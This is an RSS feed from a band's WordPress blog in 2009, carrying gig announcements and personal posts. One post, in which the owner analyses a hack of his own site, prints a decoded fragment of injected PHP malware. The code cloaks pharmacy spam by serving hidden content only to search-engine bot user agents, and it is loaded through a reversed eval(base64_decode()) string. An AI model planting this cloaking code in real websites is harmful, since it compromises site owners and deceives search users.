<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The Yellow Box</title>
	<atom:link href="http://www.theyellowbox.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://www.theyellowbox.com</link>
	<description>A New Generation of Art Rock</description>
	<lastBuildDate>Wed, 05 Aug 2009 16:52:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>August Gig Reminder</title>
		<link>http://www.theyellowbox.com/?p=255</link>
		<comments>http://www.theyellowbox.com/?p=255#comments</comments>
		<pubDate>Wed, 05 Aug 2009 16:52:50 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[The Yellow Box]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=255</guid>
		<description><![CDATA[Remember to come see The Yellow Box live on Friday, August 14th at the Village Pub in Lindenhurst.  Kongobrovo and the Heist, two bands we really like, will be kicking things off for us, so you&#8217;re sure to have a great time.  Kongobrovo will start things off at 9:00.  See you there!]]></description>
			<content:encoded><![CDATA[<p>Remember to come see The Yellow Box live on Friday, August 14th at the Village Pub in Lindenhurst.  Kongobrovo and the Heist, two bands we really like, will be kicking things off for us, so you&#8217;re sure to have a great time.  Kongobrovo will start things off at 9:00.  See you there!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=255</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RSS Spam Problem Fixed</title>
		<link>http://www.theyellowbox.com/?p=252</link>
		<comments>http://www.theyellowbox.com/?p=252#comments</comments>
		<pubDate>Tue, 30 Jun 2009 06:41:50 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[RSS]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=252</guid>
		<description><![CDATA[I found the immediate cause of the Google Reader spam problem, thanks to this thread.  It turns out that someone was able to get a hacked entry into the database (specifically, into the wp_options table).  The important parts of the entry look like this: ;))"==QfK0wOpcyMyEzbo [... lots more gibberish-looking stuff, which is actually base64_encode()'d stuff] [...]]]></description>
			<content:encoded><![CDATA[<p>I found the immediate cause of the Google Reader spam problem, thanks to <a href="http://groups.google.com/group/google-reader-troubleshoot/browse_thread/thread/39a7eef288c65dd0/3d177143fb8f5be1?lnk=gst&amp;q=spam#3d177143fb8f5be1">this thread</a>.  It turns out that someone was able to get a hacked entry into the database (specifically, into the wp_options table).  The important parts of the entry look like this:</p>
<blockquote>
<pre>;))"==QfK0wOpcyMyEzbo [... lots more gibberish-looking stuff, which is actually base64_encode()'d stuff] J3byJXZ"(edoced_46esab(lave'</pre>
</blockquote>
<p>Now, read that backwards, and it says:</p>
<pre>eval(base64_decode(" [gibberish] "));</pre>
<p>After <a href="http://www.string-functions.com/reverse.aspx">reversing</a> and <a href="http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx">decoding</a> the string of gibberish, we get the following code, which somehow gets injected into the rendering of the RSS:</p>
<blockquote>
<pre>("+(n[1]-1)+")&lt;");
                arr[i].innerHTML=txt;
            }
            }
          }catch(e){};
     };
     addLoadEvent(setUserName);
     &lt;/script&gt;';   
        }
    } }   
    add_action('admin_head','admin123');
    }
}

if(!function_exists('echo123')){ function echo123(){
    global $e123;
    if($e123) return;
    $txt=get_option('internal_links_cache');
    if($txt!="") echo base64_decode($txt);
} }
if(!function_exists('echo323')){ function echo323($c){
    global $e123;
    if($e123) return;
    $e123=true;
    $txt=get_option('internal_links_cache');
    if($txt!="") return base64_decode($txt).$c;
    return $c;
} }
if(preg_match("/bot|google|slurp|bing|msn|charlotte|crawl|yahoo|search|spider|inktomi|ask|alexa|seek/",$_SERVER["HTTP_USER_AGENT"])&amp;&amp;sizeof($_COOKIE)==0){
    add_action('the_content','echo323');
    add_action('wp_footer','echo123');
}</pre>
</blockquote>
<p>Reading the parameter into the preg_match() function, now I see why the spam appeared in Google Reader but not Bloglines.  Here&#8217;s what I don&#8217;t know:</p>
<ul>
<li>Who did this?</li>
<li>How did this get into the database in the first place?</li>
<li>How does that reversed code get un-reversed so that it can get evaluated and run?</li>
<li>How do I prevent this stuff from happening again?</li>
</ul>
<p>I will be following <a href="http://groups.google.com/group/google-reader-troubleshoot/browse_thread/thread/39a7eef288c65dd0/3d177143fb8f5be1?lnk=gst&amp;q=spam#3d177143fb8f5be1">the thread</a> to see what other solutions people are able to come up with, or if anyone is able to track the crackers down.  Please leave comments here or there if you are able to figure anything else out.  Thanks.</p>
<p>(Don&#8217;t forget what started this all &#8212; <a href="http://www.theyellowbox.com/?p=247">we&#8217;re playing a gig in Lindenhurst on August 14th!</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=252</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Hacked?  RSS Spam?  What the&#8230;</title>
		<link>http://www.theyellowbox.com/?p=250</link>
		<comments>http://www.theyellowbox.com/?p=250#comments</comments>
		<pubDate>Fri, 26 Jun 2009 01:29:22 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>
		<category><![CDATA[RSS]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=250</guid>
		<description><![CDATA[How in Sir Tim Berners-Lee&#8217;s name did this happen? My previous post on this site, the one that announces our next gig in August, reads just fine on the site.  It even looks good on Facebook, where I have the auto-blog-post-thingy enabled.  But you should see how it reads in Google Reader: Natural Avodart Herbal [...]]]></description>
			<content:encoded><![CDATA[<p>How in Sir Tim Berners-Lee&#8217;s name did this happen?  <a href="http://www.theyellowbox.com/?p=247">My previous post</a> on this site, the one that announces our next gig in August, reads just fine on the site.  It even looks good on Facebook, where I have the auto-blog-post-thingy enabled.  But you should see how it reads in Google Reader:</p>
<blockquote><p>Natural Avodart Herbal Maxx For Sale Purchase Emsam Generic Advair Diskus Exelon Without Prescription Zestril Price Buy Mycelex-g Online Diarex Price Purchase Trandate Buy Prevacid Online Karela Pill Buy Starlix Online Buying Actos Sarafem Price Purinethol Without Prescription Natural Combivent Natural Cytoxan Crestor Pill Generic Serophene Natural Proventil Tentex Forte Without Prescription Purchase Geodon Buying Ultracet Order Amoxil Altace Without Prescription Atacand Without Prescription Buying Wellbutrin Sr Order Styplon Loxitane Pill Generic Diarex Brite Without Prescription Order Styplon Buy Rimonabant Online Natural Motrin Generic Altace Lynoral For Sale Purchase Shoot Purchase Aldactone Mobic [...]</p></blockquote>
<p>What?  I&#8217;ve already heard from Ben that he sees the same thing in Google Reader.  Are there any Bloglines users that can let me know what you saw for this post?  Have any other WordPress users seen the same thing happen?  Will <em>this</em> post be readable in Google Reader?</p>
<p>By the way, please <strong>do not contact me</strong> if you&#8217;re interested in any of the fine products mentioned above.  You have found the wrong site.  (But maybe posting this will help my Google juice&#8230;)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=250</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>August Gig News</title>
		<link>http://www.theyellowbox.com/?p=247</link>
		<comments>http://www.theyellowbox.com/?p=247#comments</comments>
		<pubDate>Thu, 25 Jun 2009 14:57:08 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[The Yellow Box]]></category>
		<category><![CDATA[Gigs]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=247</guid>
		<description><![CDATA[We are very happy to report that we have booked another gig with our good friends in the Heist.  We&#8217;re coming to Lindenhurst, so all our Suffolk County friends can stop by.  (Of course, everyone else is welcome, too!)  Here&#8217;s the details: The Yellow Box &#38; The Heist The Village Pub 174 N. Wellwood Ave. [...]]]></description>
			<content:encoded><![CDATA[<p>We are very happy to report that we have booked another gig with our good friends in the Heist.  We&#8217;re coming to Lindenhurst, so all our Suffolk County friends can stop by.  (Of course, everyone else is welcome, too!)  Here&#8217;s the details:</p>
<p>The Yellow Box &amp; The Heist<br />
The Village Pub<br />
174 N. Wellwood Ave.<br />
Lindenhurst, NY<br />
Friday, August 14th</p>
<p><iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=174+N.+Wellwood+Ave.+Lindenhurst,+NY&amp;sll=40.65488,-73.647969&amp;sspn=0.01076,0.021522&amp;ie=UTF8&amp;z=14&amp;iwloc=A&amp;ll=40.698145,-73.370733&amp;output=embed"></iframe><br /><small><a href="http://maps.google.com/maps?f=q&amp;source=embed&amp;hl=en&amp;geocode=&amp;q=174+N.+Wellwood+Ave.+Lindenhurst,+NY&amp;sll=40.65488,-73.647969&amp;sspn=0.01076,0.021522&amp;ie=UTF8&amp;z=14&amp;iwloc=A&amp;ll=40.698145,-73.370733" style="color:#0000FF;text-align:left">View Larger Map</a></small></p>
<p>The only thing we don&#8217;t really know yet is what time everything is going to kick off, but it&#8217;s probably safe to assume that you won&#8217;t miss anything if you get there by 9:00.  We may also have a special guest starting the evening off right for us, so stay tuned!  Hope to see you in Lindenhurst!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=247</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Can a Simple Software Update Make Me Happy?</title>
		<link>http://www.theyellowbox.com/?p=243</link>
		<comments>http://www.theyellowbox.com/?p=243#comments</comments>
		<pubDate>Wed, 17 Jun 2009 21:34:34 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=243</guid>
		<description><![CDATA[Here&#8217;s how:]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s how:</p>
<div class="wp-caption alignnone" style="width: 620px"><a href="http://www.flickr.com/photos/cmerlo441/3636984734/"><img title="iPhone 3.0" src="http://farm4.static.flickr.com/3598/3636984734_048cb0cda8_o.png" alt="iPhone 3.0" width="610" height="251" /></a><p class="wp-caption-text">iPhone 3.0</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=243</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>One More RVC Gig!</title>
		<link>http://www.theyellowbox.com/?p=240</link>
		<comments>http://www.theyellowbox.com/?p=240#comments</comments>
		<pubDate>Thu, 21 May 2009 01:18:17 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[The Yellow Box]]></category>
		<category><![CDATA[Gigs]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=240</guid>
		<description><![CDATA[The Yellow Box is happy to announce that we&#8217;re going to be playing Reflections in Rockville Centre yet again!  This may be our last time there, because word on the street is that they&#8217;re going to be closing the doors at the end of June.  We love playing this room, and lots of you love [...]]]></description>
			<content:encoded><![CDATA[<p>The Yellow Box is happy to announce that we&#8217;re going to be playing Reflections in Rockville Centre yet again!  This may be our last time there, because word on the street is that they&#8217;re going to be closing the doors at the end of June.  We <em>love</em> playing this room, and lots of you love hearing us there, so don&#8217;t miss out on what may be your last chance to enjoy the ambience!</p>
<p>As an added incentive, we are bringing some good friends of ours to the club.  The Heist will be playing the first set next Saturday, and they flat-out <strong>rock</strong>.  You have to hear these guys; we have missed rehearsal to go check them out live.  They&#8217;re worth it.  And we&#8217;re going to have a blast sharing the stage.</p>
<p>So, we hope to see you there, next Saturday, May 30.  The Heist goes on at 10, and we should start around 11.  Once again, the setting is:</p>
<p>Reflections Bar<br />
324 Sunrise Highway<br />
Rockville Centre, NY 11570<br />
<iframe width="425" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=324+sunrise+highway,+rockville+centre,+ny&amp;sll=40.65488,-73.647969&amp;sspn=0.010874,0.021865&amp;ie=UTF8&amp;ll=40.666837,-73.637924&amp;spn=0.010874,0.021865&amp;z=14&amp;iwloc=A&amp;output=embed"></iframe><br /><small><a href="http://maps.google.com/maps?f=q&amp;source=embed&amp;hl=en&amp;geocode=&amp;q=324+sunrise+highway,+rockville+centre,+ny&amp;sll=40.65488,-73.647969&amp;sspn=0.010874,0.021865&amp;ie=UTF8&amp;ll=40.666837,-73.637924&amp;spn=0.010874,0.021865&amp;z=14&amp;iwloc=A" style="color:#0000FF;text-align:left">View Larger Map</a></small></p>
<p>We also have a <a href="http://www.facebook.com/event.php?eid=103686341816">Facebook page set up for the event</a>, so let us know you&#8217;re coming!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=240</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Persistence of Time (or lack thereof)</title>
		<link>http://www.theyellowbox.com/?p=237</link>
		<comments>http://www.theyellowbox.com/?p=237#comments</comments>
		<pubDate>Thu, 14 May 2009 18:14:58 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>
		<category><![CDATA[Daylight Savings]]></category>
		<category><![CDATA[Work]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=237</guid>
		<description><![CDATA[I&#8217;m in a grade dispute with a student right now, and even though I have no reason not to trust her, I feel like she&#8217;s trying to pull a fast one on me. There was an assignment due on Thursday, March 5th, at 2:30 PM.  We were still in Eastern Standard Time then, and would [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m in a grade dispute with a student right now, and even though I have no reason not to trust her, I feel like she&#8217;s trying to pull a fast one on me.</p>
<p>There was an assignment due on Thursday, March 5th, at 2:30 PM.  We were still in Eastern Standard Time then, and would switch to Eastern Daylight Time nine days later.  The assignment had to be submitted through e-mail (a process which I will be changing for the fall, so that I don&#8217;t have to go through this again).  She used her Hotmail account to send the e-mail to my school account, which gets forwarded to my Gmail account.  In Gmail, when I click &#8220;Show details&#8221; on the e-mail, it says:</p>
<blockquote><p><span class="gI">date</span><span class="gI"><span class="ik"><img src="https://mail.google.com/mail/images/cleardot.gif" alt="" width="16" height="16" /></span>Thu, Mar 5, 2009 at 2:41 PM</span></p></blockquote>
<p><span class="gI">And so I assigned a grade of zero, because the assignment was late.  But when she forwarded me a copy of the e-mail from her sent folder, the following text appeared in it, presumably put there by Hotmail:</span></p>
<blockquote><p>Date: Thu, 5 Mar 2009 13:41:27 -0500</p></blockquote>
<p>13:41 is, of course, 1:41 PM in military time.  So, I&#8217;m trying to figure out exactly what is going on here, and I think it&#8217;s got to be one of the following:</p>
<ul>
<li>Scenario 1: Gmail has &#8220;translated&#8221; the original sent time, in EST, to EDT, so that it looks like 2:41.  I feel approximately 0% certain that this is the case, but I can&#8217;t test it until November, when we go back to EST.</li>
<li>Scenario 2: Hotmail has &#8220;translated&#8221; the original sent time somehow.  Of course, for that to make sense, it would have had to make the time later, not earlier, since we &#8220;spring forward&#8221; and &#8220;fall back&#8221;.  Again, my certainty in this hovers around 0%.</li>
<li>Scenario 3: In forwarding the original e-mail to me, the student &#8212; whom I have no reason to distrust based on any past events, but who is still a student trying to get good grades &#8212; changed the original time an hour earlier in an attempt to get credit for an assignment.  My certainty that this happened: 10%.</li>
</ul>
<p>So, I&#8217;m 90% certain that whatever happened is something I really don&#8217;t understand, and am incapable of thinking up.  If any of you dear readers think up an alternate explanation, <em>please</em> let me know, because I&#8217;m out of ideas.  Thanks.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=237</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>About The Mets</title>
		<link>http://www.theyellowbox.com/?p=235</link>
		<comments>http://www.theyellowbox.com/?p=235#comments</comments>
		<pubDate>Sat, 09 May 2009 20:22:15 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>
		<category><![CDATA[Baseball]]></category>
		<category><![CDATA[New York Mets]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=235</guid>
		<description><![CDATA[Carrie&#8217;s on a train into the city to meet her mom and her brother, to navigate them through Penn Station for their Mother&#8217;s Day visit. I should be writing final exams, but Jack is up and squirming, so I&#8217;m watching him. This doesn&#8217;t leave a lot of opportunity to think and type, but it&#8217;s a [...]]]></description>
			<content:encoded><![CDATA[<p>Carrie&#8217;s on a train into the city to meet her mom and her brother, to navigate them through Penn Station for their Mother&#8217;s Day visit. I should be writing final exams, but Jack is up and squirming, so I&#8217;m watching him. This doesn&#8217;t leave a lot of opportunity to think and type, but it&#8217;s a good time to watch the Mets and try out this WordPress software on the iPhone.</p>
<p>A couple of thoughts:  First, no excuse for not signing Derek Lowe this off-season, and it was an even worse blunder to re-sign Oliver Perez.  Now that Ollie&#8217;s finally out of the rotation (on the DL, instead of in Buffalo where he belongs), how is Nelson Figueroa not back up?  Niese is a fine pitcher, but what else does Figgie have to do to earn a spot?</p>
<p>Carlos Delgado.  (What else needs to be said?)</p>
<p>Lots of my non-Mets fan friends thought the Mets were crazy for a) not going after Manny Ramirez, and b) signing Gary Sheffield, both of which were moves I loved at the time. In retrospect, it&#8217;s been the smartest thing Omar could have done. Now the team has won six games in a row and is in a fight for first place. Great things seem to be ahead.</p>
<p>It still drives me right up the wall to see Jose Reyes come up to bat in the later innings against a struggling pitcher, swing at the first pitch (especially with ducks on the pond, as Keith Hernandez would say), pop up to an infielder, and let the opposing pitcher off the hook. Jerry and HoJo need to address this before Jose can become the superstar everyone wants him to become.</p>
<p>Ok, looks like Jack&#8217;s asleep, so I need to take this opportunity to write another final exam. Let&#8217;s Go Mets!  And Happy Mother&#8217;s Day, especially to the new mom in my house, and the experienced mom in the house where I grew up.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=235</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Some Updates</title>
		<link>http://www.theyellowbox.com/?p=233</link>
		<comments>http://www.theyellowbox.com/?p=233#comments</comments>
		<pubDate>Fri, 08 May 2009 23:34:48 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>
		<category><![CDATA[The Yellow Box]]></category>
		<category><![CDATA[Gear]]></category>
		<category><![CDATA[Studio]]></category>
		<category><![CDATA[Website News]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=233</guid>
		<description><![CDATA[While we&#8217;re not 100% set up, we&#8217;re at least about 95% there in our new studio.  Rich and Charlie really did an excellent job moving everything, painting and carpeting.  It is an absolute pleasure to work in the new room.  We realized after our first rehearsal that the old bluish-grey room actually inspired us to [...]]]></description>
			<content:encoded><![CDATA[<p>While we&#8217;re not 100% set up, we&#8217;re at least about 95% there in our new studio.  Rich and Charlie really did an excellent job moving everything, painting and carpeting.  It is an absolute pleasure to work in the new room.  We realized after our first rehearsal that the old bluish-grey room actually inspired us to loaf around, whereas the new color scheme inspires us to play more and play better.  We sound amazing, and that&#8217;s also inspiring us to play more.</p>
<p>I have finally decided, after months and months of searching for the right bass, that it doesn&#8217;t exist, and that creating it will either be difficult or expensive, and will still not guarantee that I will get the sound and feel I&#8217;m after.  So, instead I have ordered a four-string fretless Fender American Standard Jazz Bass, and Larry at Sam Ash will be installing a Hipshot de-tuner for me so that I can get down to the notes I need to get to.  While it&#8217;s not a perfect solution, no solution was going to be; and, at least, this bass will be ready to play when it gets to Sam Ash on Tuesday.</p>
<p>When I switched the site over to our new hosting provider a couple of months ago, I exposed a couple of hiccups.  Thanks to Vin and Michael for letting Rich know that the mp3&#8242;s were unaccessable from the Music Downloads page; they&#8217;re back.  And thanks to Ben for letting me know that the post right before this one looked absolutely terrible.  Once upon a time, I had set up my delicious.com account to automatically post new links to the blog.  I guess there was some sort of glitch with the way I had the site running on the old host, and I&#8217;m assuming that as I moved everything over to here, as the Bobs said in Office Space, &#8220;we fixed the glitch&#8221;.  Anyway, I turned off the delicious.com posting (since my bookmarks show up on the right side of the page anyway), and so that shouldn&#8217;t happen again.  Thank you all for looking out for us.</p>
<p>The past couple of weeks at the studio, we have had the best of intentions regarding setting up all our recording equipment, so that we can finally begin recording our debut album.  But the room sounds so good that we can&#8217;t stop jamming!  And we&#8217;ve had a couple of friends stop by to jam as well, which has also made the room sound amazing.  We&#8217;ll get there.</p>
<p>I promise, my next post will have pictures of Jack.  Finals end in a week, so I&#8217;ll have the time.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=233</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>links for 2009-05-05</title>
		<link>http://www.theyellowbox.com/?p=232</link>
		<comments>http://www.theyellowbox.com/?p=232#comments</comments>
		<pubDate>Wed, 06 May 2009 02:03:45 +0000</pubDate>
		<dc:creator>Chris</dc:creator>
				<category><![CDATA[Chris' Blog]]></category>

		<guid isPermaLink="false">http://www.theyellowbox.com/?p=232</guid>
		<description><![CDATA[\n Color Scheme Designer 3 \n Color scheme for latest design of PHProf \n (tags: webdesign webdev web2.0) \n]]></description>
			<content:encoded><![CDATA[<ul class=\"delicious\">
<li>\n
<div class=\"delicious-link\"><a href=\"http://colorschemedesigner.com/#3M31T1BhWw0w0\">Color Scheme Designer 3</a></div>
<p>\n
<div class=\"delicious-extended\">Color scheme for latest design of PHProf</div>
<p>\n
<div class=\"delicious-tags\">(tags: <a href=\"http://delicious.com/cmerlo/webdesign\">webdesign</a> <a href=\"http://delicious.com/cmerlo/webdev\">webdev</a> <a href=\"http://delicious.com/cmerlo/web2.0\">web2.0</a>)</div>
<p>\n            </li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.theyellowbox.com/?feed=rss2&amp;p=232</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
